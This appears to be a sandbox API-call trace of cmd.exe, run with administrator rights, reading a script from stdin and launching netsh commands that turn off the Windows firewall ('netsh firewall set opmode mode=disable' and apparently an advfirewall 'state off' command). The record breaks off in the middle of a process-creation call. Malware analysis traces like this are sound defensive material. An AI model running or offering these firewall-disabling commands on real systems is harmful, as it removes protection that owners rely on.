dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce346, cchWideChar=1 | out: lpWideCharStr="ot currentprofile state off\n") returned 1 [0065.180] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.180] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.180] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce348, cchWideChar=1 | out: lpWideCharStr="p currentprofile state off\n") returned 1 [0065.180] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.180] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.181] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34a, cchWideChar=1 | out: lpWideCharStr="mcurrentprofile state off\n") returned 1 [0065.181] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.181] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.181] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34c, cchWideChar=1 | out: lpWideCharStr="ourrentprofile state off\n") returned 1 [0065.181] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.181] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.181] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce34e, cchWideChar=1 | out: lpWideCharStr="drrentprofile state off\n") returned 1 [0065.181] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.181] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.181] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce350, cchWideChar=1 | out: lpWideCharStr="erentprofile state off\n") returned 1 [0065.181] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.181] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.181] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce352, cchWideChar=1 | out: lpWideCharStr=" entprofile state off\n") returned 1 [0065.181] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.181] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.181] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce354, cchWideChar=1 | out: lpWideCharStr="mntprofile state off\n") returned 1 [0065.181] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.181] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.181] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce356, cchWideChar=1 | out: lpWideCharStr="otprofile state off\n") returned 1 [0065.181] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.182] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.182] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce358, cchWideChar=1 | out: lpWideCharStr="dprofile state off\n") returned 1 [0065.182] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.182] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.182] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35a, cchWideChar=1 | out: lpWideCharStr="erofile state off\n") returned 1 [0065.182] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.182] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.182] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35c, cchWideChar=1 | out: lpWideCharStr="=ofile state off\n") returned 1 [0065.182] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.182] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.182] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce35e, cchWideChar=1 | out: lpWideCharStr="dfile state off\n") returned 1 [0065.182] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.182] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.182] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.182] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce360, cchWideChar=1 | out: lpWideCharStr="iile state off\n") returned 1 [0065.182] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.183] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.183] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce362, cchWideChar=1 | out: lpWideCharStr="sle state off\n") returned 1 [0065.183] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.183] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.183] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce364, cchWideChar=1 | out: lpWideCharStr="ae state off\n") returned 1 [0065.183] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.183] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.183] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce366, cchWideChar=1 | out: lpWideCharStr="b state off\n") returned 1 [0065.183] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.183] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.183] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce368, cchWideChar=1 | out: lpWideCharStr="lstate off\n") returned 1 [0065.183] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.183] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.183] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.183] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce36a, cchWideChar=1 | out: lpWideCharStr="etate off\n") returned 1 [0065.183] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.184] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.184] ReadFile (in: hFile=0x98, lpBuffer=0x4a4cc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x2cfa58, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesRead=0x2cfa58*=0x1, lpOverlapped=0x0) returned 1 [0065.184] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a4cc320, cbMultiByte=1, lpWideCharStr=0x4a4ce36c, cchWideChar=1 | out: lpWideCharStr="\nate off\n") returned 1 [0065.184] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.184] GetFileType (hFile=0x98) returned 0x3 [0065.184] _get_osfhandle (_FileHandle=0) returned 0x98 [0065.184] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.184] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.184] GetFileType (hFile=0xfc) returned 0x3 [0065.184] _get_osfhandle (_FileHandle=1) returned 0xfc [0065.184] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="netsh firewall set opmode mode=disable\n", cchWideChar=-1, lpMultiByteStr=0x4a4cc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netsh firewall set opmode mode=disable\n", lpUsedDefaultChar=0x0) returned 40 [0065.184] WriteFile (in: hFile=0xfc, lpBuffer=0x4a4cc320*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x2cfa38, lpOverlapped=0x0 | out: lpBuffer=0x4a4cc320*, lpNumberOfBytesWritten=0x2cfa38*=0x27, lpOverlapped=0x0) returned 1 [0065.184] GetProcessHeap () returned 0x470000 [0065.184] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4012) returned 0x48f630 [0065.185] GetProcessHeap () returned 0x470000 [0065.185] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x48f630 | out: hHeap=0x470000) returned 1 [0065.185] GetProcessHeap () returned 0x470000 [0065.185] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb0) returned 0x485b70 [0065.185] GetProcessHeap () returned 0x470000 [0065.185] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x484610 [0065.186] GetProcessHeap () returned 0x470000 [0065.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x54) returned 0x489f20 [0065.186] GetConsoleOutputCP () returned 0x1b5 [0065.186] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4cbfe0 | out: lpCPInfo=0x4a4cbfe0) returned 1 [0065.186] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0065.186] GetConsoleTitleW (in: lpConsoleTitle=0x2cf9f0, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0065.186] GetProcessHeap () returned 0x470000 [0065.186] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x471ab0 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x60) returned 0x485c30 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x420) returned 0x4897e0 [0065.187] SetErrorMode (uMode=0x0) returned 0x0 [0065.187] SetErrorMode (uMode=0x1) returned 0x0 [0065.187] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4897f0, lpFilePart=0x2cf280 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf280*="Desktop") returned 0x25 [0065.187] SetErrorMode (uMode=0x0) returned 0x1 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4897e0, Size=0x68) returned 0x4897e0 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x4897e0) returned 0x68 [0065.187] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0065.187] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x128) returned 0x471cd0 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x240) returned 0x489860 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489860, Size=0x12a) returned 0x489860 [0065.187] GetProcessHeap () returned 0x470000 [0065.187] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489860) returned 0x12a [0065.188] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4bf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0065.188] GetProcessHeap () returned 0x470000 [0065.188] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe8) returned 0x4899a0 [0065.188] GetProcessHeap () returned 0x470000 [0065.188] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4899a0, Size=0x7e) returned 0x4899a0 [0065.188] GetProcessHeap () returned 0x470000 [0065.188] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x4899a0) returned 0x7e [0065.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.188] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0xffffffffffffffff [0065.188] GetLastError () returned 0x2 [0065.188] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0xffffffffffffffff [0065.188] GetLastError () returned 0x2 [0065.188] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0065.189] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0x489a30 [0065.189] FindClose (in: hFindFile=0x489a30 | out: hFindFile=0x489a30) returned 1 [0065.189] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0xffffffffffffffff [0065.189] GetLastError () returned 0x2 [0065.189] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x2ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ceff0) returned 0x489a30 [0065.189] FindClose (in: hFindFile=0x489a30 | out: hFindFile=0x489a30) returned 1 [0065.189] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0065.189] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0065.189] GetConsoleTitleW (in: lpConsoleTitle=0x2cf540, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0065.190] GetProcessHeap () returned 0x470000 [0065.190] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x21c) returned 0x489a30 [0065.190] GetConsoleTitleW (in: lpConsoleTitle=0x489a40, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0065.190] GetProcessHeap () returned 0x470000 [0065.190] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x489a30, Size=0xc6) returned 0x489a30 [0065.190] GetProcessHeap () returned 0x470000 [0065.190] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x489a30) returned 0xc6 [0065.190] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - netsh firewall set opmode mode=disable") returned 1 [0065.190] GetProcessHeap () returned 0x470000 [0065.190] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489a30 | out: hHeap=0x470000) returned 1 [0065.190] InitializeProcThreadAttributeList (in: lpAttributeList=0x2cf2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cf2b8 | out: lpAttributeList=0x2cf2f8, lpSize=0x2cf2b8) returned 1 [0065.190] UpdateProcThreadAttribute (in: lpAttributeList=0x2cf2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cf2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2cf2f8, lpPreviousValue=0x0) returned 1 [0065.190] GetStartupInfoW (in: lpStartupInfo=0x2cf410 | out: lpStartupInfo=0x2cf410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x98, hStdOutput=0xfc, hStdError=0xfc)) [0065.191] GetProcessHeap () returned 0x470000 [0065.191] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x20) returned 0x484640 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0065.191] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0065.192] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0065.192] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0065.192] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0065.192] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0065.192] GetProcessHeap () returned 0x470000 [0065.192] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x484640 | out: hHeap=0x470000) returned 1 [0065.192] GetProcessHeap () returned 0x470000 [0065.192] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x485ca0 [0065.192] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\netsh.exe", lpCommandLine="netsh firewall set opmode mode=disable", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2cf330*(cb=0x70, 